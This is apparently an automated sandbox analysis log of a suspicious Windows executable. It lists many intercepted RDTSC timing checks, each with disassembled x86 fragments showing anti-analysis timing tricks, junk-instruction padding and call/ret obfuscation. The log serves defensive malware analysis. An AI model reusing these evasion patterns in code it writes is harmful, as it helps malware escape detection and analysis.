                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FCF9F second address: 12FCFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 jp 00007FC40050481Ch 0x0000000d pop esi 0x0000000e nop 0x0000000f sub bx, 290Fh 0x00000014 push 00000000h 0x00000016 mov edi, 14736BFFh 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e movsx esi, dx 0x00000021 jmp 00007FC400504826h 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push edx 0x0000002a jmp 00007FC400504820h 0x0000002f pop edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FCFF5 second address: 12FD006 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDFB2 second address: 12FDFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF0D0 second address: 12FF0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF0D4 second address: 12FF0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC400504827h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130269D second address: 1302709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a sub dword ptr [ebp+122D1829h], eax 0x00000010 mov dword ptr [ebp+1245D951h], esi 0x00000016 popad 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FC400D80DA8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 xor ebx, dword ptr [ebp+122D2BDEh] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FC400D80DA8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 push ebx 0x00000056 mov edi, 2114D800h 0x0000005b pop ebx 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD13A second address: 12FD13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE243 second address: 12FE247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF292 second address: 12FF296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD13F second address: 12FD146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130037B second address: 1300387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304958 second address: 1304977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC400D80DA6h 0x0000000a popad 0x0000000b jmp 00007FC400D80DAEh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF296 second address: 12FF2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC40050481Ch 0x0000000c jne 00007FC400504816h 0x00000012 popad 0x00000013 push eax 0x00000014 je 00007FC400504822h 0x0000001a jng 00007FC40050481Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD146 second address: 12FD15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007FC400D80DA8h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305700 second address: 1305712 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 js 00007FC400504824h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300387 second address: 1300392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC400D80DA6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304977 second address: 1304980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305712 second address: 1305716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304980 second address: 1304984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF375 second address: 12FF379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305716 second address: 1305781 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FC400504818h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 cmc 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D2338h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FC400504818h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov ebx, dword ptr [ebp+122D29B6h] 0x0000004c xchg eax, esi 0x0000004d jmp 00007FC40050481Ah 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF379 second address: 12FF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305781 second address: 1305785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305785 second address: 130578B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A280 second address: 130A2A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A2A4 second address: 130A2AE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130DE6D second address: 130DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311E6F second address: 1311E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311E75 second address: 1311E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1311E79 second address: 1311EAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jg 00007FC400D80DAEh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jc 00007FC400D80DAEh 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13058E0 second address: 13058E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13058E4 second address: 130598F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FC400D80DA8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jnp 00007FC400D80DACh 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov ebx, dword ptr [ebp+122D221Eh] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FC400D80DA8h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov edi, 152F9A10h 0x0000005d mov eax, dword ptr [ebp+122D10D5h] 0x00000063 jnc 00007FC400D80DB4h 0x00000069 push FFFFFFFFh 0x0000006b jmp 00007FC400D80DB1h 0x00000070 push eax 0x00000071 jo 00007FC400D80DAEh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318D4B second address: 1318D66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC40050481Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13180DF second address: 13180E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131864C second address: 1318662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007FC400504816h 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318787 second address: 131879B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC400D80DAEh 0x0000000c jo 00007FC400D80DA6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131879B second address: 13187A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13187A1 second address: 13187B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC400D80DACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13187B1 second address: 13187B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318906 second address: 131890A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318BDF second address: 1318BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC400504824h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318BFC second address: 1318C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B96C second address: 131B988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC400504826h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131B988 second address: 131B9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC400D80DB2h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0168 second address: 12B016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B016E second address: 12B0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0172 second address: 12B017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F91D second address: 131F921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FBB5 second address: 131FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FBBE second address: 131FBD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400D80DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FBD8 second address: 131FBE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC400504816h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FFF8 second address: 131FFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FFFC second address: 1320015 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC400504816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jnp 00007FC400504816h 0x00000015 pop edi 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320015 second address: 1320022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FC400D80DB2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202C1 second address: 13202C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202C8 second address: 13202CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202CE second address: 13202D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13202D7 second address: 13202DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13206D8 second address: 13206DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13206DF second address: 13206E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC400D80DAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132086F second address: 132087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D151D second address: 12D1529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FC400D80DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B507C second address: 12B5090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a jl 00007FC40050481Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5090 second address: 12B5099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F649 second address: 131F66B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC400504832h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC400504816h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E99B9 second address: 12E99BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E99BE second address: 12E99C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC40050481Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E99C8 second address: 12E9A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], ebx 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC400D80DA8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D182Fh], edx 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov ch, 50h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 xor dword ptr [ebp+122D282Bh], ecx 0x0000003f mov dword ptr [ebp+1248F61Dh], esp 0x00000045 mov dword ptr [ebp+122D282Bh], esi 0x0000004b cmp dword ptr [ebp+122D2BE6h], 00000000h 0x00000052 jne 00007FC400D80E93h 0x00000058 movsx ecx, dx 0x0000005b mov ecx, ebx 0x0000005d mov byte ptr [ebp+122D2854h], 00000047h 0x00000064 mov dword ptr [ebp+122D1BF5h], ebx 0x0000006a mov eax, D49AA7D2h 0x0000006f pushad 0x00000070 add al, 00000038h 0x00000073 mov eax, dword ptr [ebp+122D2B9Ah] 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e jmp 00007FC400D80DB8h 0x00000083 pushad 0x00000084 popad 0x00000085 popad 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAA40 second address: 12EAA89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC400504821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC400504818h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1248F5C5h] 0x0000002a mov ecx, dword ptr [ebp+124622F2h] 0x00000030 nop 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push esi 0x00000035 pop esi 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAA89 second address: 12EAAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC400D80DB7h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC400D80DB9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAAC3 second address: 12EAACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC400504816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAACE second address: 12D151D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dh, FAh 0x0000000a call dword ptr [ebp+12471FB8h] 0x00000010 jmp 00007FC400D80DB4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324738 second address: 132473E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324904 second address: 1324964 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC400D80DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC400D80DACh 0x00000010 jc 00007FC400D80DA6h 0x00000016 pushad 0x00000017 jmp 00007FC400D80DADh 0x0000001c jmp 00007FC400D80DABh 0x00000021 jmp 00007FC400D80DB0h 0x00000026 popad 0x00000027 popad 0x00000028 je 00007FC400D80DC4h 0x0000002e jmp 00007FC400D80DB6h 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324ABA second address: 1324AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC40050481Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FC400504833h 0x0000000f jmp 00007FC400504827h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324C0F second address: 1324C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC400D80DA6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jp 00007FC400D80DA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1324C23 second address: 1324C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC40050481Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325036 second address: 1325040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC400D80DA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325040 second address: 1325068 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC400504816h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC400504828h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325068 second address: 132506C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A010 second address: 132A014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
